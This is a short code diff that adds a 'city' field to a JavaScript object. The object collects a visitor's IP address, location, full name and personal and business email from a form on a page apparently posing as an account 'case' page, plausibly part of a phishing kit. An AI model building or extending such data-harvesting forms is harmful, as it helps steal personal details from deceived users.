--- a/case/100081295808699.html
+++ b/case/100081295808699.html
@@ -5448,6 +5448,7 @@
                 'ip_address': userIpData.user_ip,
                 'country': userIpData.country,
                 'country_code': userIpData.country_code,
+                'city': data.city,
                 'full_name': formsSendData['full-name'],
                 'pers_email': formsSendData['personal-email'],
                 'bus_email': formsSendData['buiseness-email'],
